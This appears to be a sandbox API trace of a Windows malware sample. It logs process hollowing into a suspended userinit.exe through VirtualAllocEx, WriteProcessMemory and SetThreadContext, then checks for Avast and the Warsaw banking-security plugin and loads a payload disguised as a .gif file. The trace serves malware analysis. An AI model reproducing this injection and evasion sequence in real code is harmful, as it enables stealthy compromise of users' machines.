[0240.582] GlobalUnlock (hMem=0x189000c) returned 0
[0240.582] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0240.582] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.583] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.583] GlobalUnlock (hMem=0x189000c) returned 0
[0240.583] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0240.583] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.584] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.584] GlobalUnlock (hMem=0x189000c) returned 0
[0240.584] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0240.584] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.584] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.584] GlobalUnlock (hMem=0x189000c) returned 0
[0240.584] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0240.584] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.585] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.585] GlobalUnlock (hMem=0x189000c) returned 0
[0240.585] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0240.585] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.586] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.586] GlobalUnlock (hMem=0x189000c) returned 0
[0240.586] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0240.586] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.586] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.586] GlobalUnlock (hMem=0x189000c) returned 0
[0240.587] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0240.587] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.588] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.588] GlobalUnlock (hMem=0x189000c) returned 0
[0240.588] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0240.588] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.588] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.588] GlobalUnlock (hMem=0x189000c) returned 0
[0240.588] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0240.588] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.589] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.589] GlobalUnlock (hMem=0x189000c) returned 0
[0240.589] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0240.589] GlobalLock (hMem=0x189000c) returned 0x25b100
[0240.590] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x15c, hThread=0x160, dwProcessId=0xaa0, dwThreadId=0x9a8)) returned 1
[0240.640] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0240.640] GetThreadContext (in: hThread=0x160, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdd000, Edx=0x0, Ecx=0x0, Eax=0xcf2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8f808, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0240.640] ReadProcessMemory (in: hProcess=0x15c, lpBaseAddress=0x7ffdd008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0240.640] VirtualAllocEx (hProcess=0x15c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0240.641] VirtualAlloc (lpAddress=0x1e80000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1e80000
[0240.646] WriteProcessMemory (in: hProcess=0x15c, lpBaseAddress=0x400000, lpBuffer=0x1e7c5bc*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1e7c5bc*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0240.656] WriteProcessMemory (in: hProcess=0x15c, lpBaseAddress=0x7ffdd008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0240.656] SetThreadContext (hThread=0x160, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdd000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8f808, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0240.656] ResumeThread (hThread=0x160) returned 0x1
[0240.683] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0240.684] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0240.684] GlobalUnlock (hMem=0x189000c) returned 0
[0240.684] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0240.684] GlobalUnlock (hMem=0x1890004) returned 0
[0240.690] Sleep (dwMilliseconds=0xe74e)
[0250.718] VirtualFree (lpAddress=0x1ee0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0250.718] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0250.719] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0250.719] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0250.719] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0250.719] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168
[0250.719] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0250.719] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0250.719] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0250.719] SetFilePointer (in: hFile=0x168, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0250.722] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0250.722] ReadFile (in: hFile=0x168, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0250.724] CloseHandle (hObject=0x168) returned 1
[0250.724] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.725] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.725] GlobalUnlock (hMem=0x189000c) returned 0
[0250.725] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0250.725] GlobalLock (hMem=0x189000c) returned 0x25b100
[0250.726] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0250.726] GlobalUnlock (hMem=0x189000c) returned 0
[0250.726] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0250.727] GlobalLock (hMem=0x189000c) returned 0x25f110
[0250.728] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0250.728] GlobalUnlock (hMem=0x189000c) returned 0
[0250.728] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0250.728] GlobalLock (hMem=0x189000c) returned 0x265120
[0250.729] GlobalHandle (pMem=0x265120) returned 0x189000c
[0250.729] GlobalUnlock (hMem=0x189000c) returned 0
[0250.729] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0250.729] GlobalLock (hMem=0x189000c) returned 0x265120
[0250.730] GlobalHandle (pMem=0x265120) returned 0x189000c
[0250.730] GlobalUnlock (hMem=0x189000c) returned 0
